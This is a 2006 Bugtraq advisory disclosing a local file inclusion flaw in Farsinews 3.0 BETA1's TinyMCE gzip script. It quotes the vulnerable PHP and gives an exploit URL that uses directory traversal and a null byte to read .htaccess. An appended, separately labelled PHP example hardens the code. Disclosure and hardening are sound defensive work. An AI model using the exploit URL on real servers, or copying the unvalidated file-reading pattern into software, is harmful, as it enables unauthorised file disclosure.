Message-ID: <20060710153333.19475.qmail@securityfocus.com>
Date: 10 Jul 2006 15:33:33 -0000
From: armin390@...il.com
To: bugtraq@...urityfocus.com
Subject: Local file inclusion in Farsinews3.0BETA1


If magic_quotes_gpc is Off in php.ini, then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use ;)!!
Why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
	$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
	$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
	$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
	if ($theme) {
		// Write main script and patch some things
		echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
		echo 'TinyMCE.prototype.loadScript = function() {};';
		echo "tinyMCE.init(TinyMCECompressed_settings);";

		// Load theme, language pack and theme language packs
		echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
		echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
		echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit
For example:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...
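
A hardened form of the parameter handling quoted above, as an added example that is not part of the original post and is not TinyMCE or Farsinews code. It validates theme and language against a strict pattern and confirms each resolved path stays inside the script directory, so it does not depend on the magic_quotes_gpc setting. The helper names safe_name() and read_under_base(), the "en" default and the empty $suffix are assumptions.

```php
<?php
// Added example. safe_name() and read_under_base() are hypothetical helpers,
// not functions from TinyMCE or Farsinews.

// Accept only short identifiers. \A and \z anchor the whole string, so a
// trailing newline or an embedded NUL byte cannot slip past the pattern.
function safe_name($value, $default = "") {
    if (!is_string($value) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $value)) {
        return $default;
    }
    return $value;
}

// Return the contents of a .js file under $baseDir, or "" when the resolved
// path is missing, is not a regular .js file, or lies outside $baseDir.
function read_under_base($baseDir, $relative) {
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $path === false) {
        return "";
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return "";
    }
    if (!is_file($path) || substr($path, -3) !== ".js") {
        return "";
    }
    return file_get_contents($path);
}

// Constructed inputs: two ordinary values and the traversal string from the
// post after URL decoding (%00 becomes a NUL byte).
$samples = array("advanced", "en", "../../../../.htaccess\0");
foreach ($samples as $s) {
    printf("%-28s => %s\n", json_encode($s), safe_name($s) === "" ? "rejected" : "accepted");
}

// How the script's loads would look with both checks applied.
$theme    = safe_name(isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "");
$language = safe_name(isset($_REQUEST['language']) ? $_REQUEST['language'] : "", "en");
$suffix   = "";  // assumption: the original script sets this elsewhere
if ($theme !== "") {
    echo read_under_base(__DIR__, "themes/$theme/editor_template$suffix.js");
    echo read_under_base(__DIR__, "themes/$theme/langs/$language.js");
    echo read_under_base(__DIR__, "langs/$language.js");
}
```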

